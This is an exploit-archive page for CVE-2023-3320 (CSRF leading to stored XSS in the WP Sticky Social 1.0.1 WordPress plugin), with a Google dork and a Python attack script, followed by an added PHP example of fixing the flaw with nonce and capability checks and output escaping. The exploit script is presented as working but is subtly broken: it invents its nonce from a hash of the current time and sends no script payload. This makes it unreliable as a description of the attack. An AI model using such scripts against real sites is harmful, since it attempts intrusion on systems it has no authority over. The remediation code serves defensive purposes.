WordPress WP Sticky Social 1.0.1 CSRF / Cross Site Scripting

2023.06.22
Risk: Low
Local: No
Remote: Yes

# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
# Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320

import requests
import hashlib
import time

# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"

# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()

# Set the data payload
payload = {
    "wpss_nonce": nonce,
    "wpss_setting_1": "value_1",
    "wpss_setting_2": "value_2",
    # Add additional settings as needed
}

# Set the request headers
headers = {
    "User-Agent": user_agent,
    "Referer": url,
    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
    # Add additional headers as needed
}

# Send the POST request
response = requests.post(url, data=payload, headers=headers)

# Check the response status code
if response.status_code == 200:
    print("Request successful")
else:
    print("Request failed")
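The issue above is a settings form that accepts a POST without a valid, user-bound nonce, so a page on another origin can submit settings on behalf of a logged-in administrator, and the stored value is later rendered without escaping. The following PHP is an added illustration written for this page, not WP Sticky Social's own code, of how a WordPress settings handler closes both gaps: a capability check, a nonce check with check_admin_referer(), sanitization on input, and esc_attr() on output. The option name wpss_example_settings, the nonce action wpss_example_save and the function names are assumptions chosen for the example.

```php
<?php
// Added illustration (not WP Sticky Social's own code): a WordPress settings
// handler that cannot be driven by a forged cross-site POST and that escapes
// stored values on output. Option name, nonce action and function names are
// assumptions for this example.

// Renders the settings form on the plugin's admin page.
function wpss_example_render_form() {
    $settings = get_option( 'wpss_example_settings', array() );
    $value    = isset( $settings['setting_1'] ) ? $settings['setting_1'] : '';

    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    // The nonce is tied to the logged-in user's session; a page on another
    // origin cannot read it, so a forged request cannot include a valid one.
    wp_nonce_field( 'wpss_example_save', 'wpss_nonce' );
    echo '<input type="hidden" name="action" value="wpss_example_save">';
    // esc_attr() on output keeps a stored value from breaking out of the
    // attribute, which is what turns a saved string into stored XSS.
    echo '<input type="text" name="wpss_setting_1" value="' . esc_attr( $value ) . '">';
    submit_button();
    echo '</form>';
}

// Handles the POST routed through admin-post.php.
function wpss_example_save_settings() {
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', 403 );
    }

    // 2. Nonce check: dies unless wpss_nonce is a valid nonce for this action
    //    and this user. A cross-site request has no way to obtain that value,
    //    so the CSRF vector is closed here regardless of what the form contains.
    check_admin_referer( 'wpss_example_save', 'wpss_nonce' );

    // 3. Sanitize on input: strip tags and control characters before storing,
    //    so markup never reaches the option even if output escaping is missed.
    $settings = array(
        'setting_1' => sanitize_text_field( wp_unslash( $_POST['wpss_setting_1'] ?? '' ) ),
    );
    update_option( 'wpss_example_settings', $settings );

    wp_safe_redirect( add_query_arg( 'settings-updated', 'true', wp_get_referer() ) );
    exit;
}
add_action( 'admin_post_wpss_example_save', 'wpss_example_save_settings' );
```

The two checks are independent and both are needed: the capability check stops a low-privileged account from saving settings directly, and the nonce check stops a forged request riding on an administrator's session. Escaping on output is kept even though input is sanitized, so a value that reaches the option by any other path (import, direct database edit) is still rendered safely.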


Copyright 2024, cxsecurity.com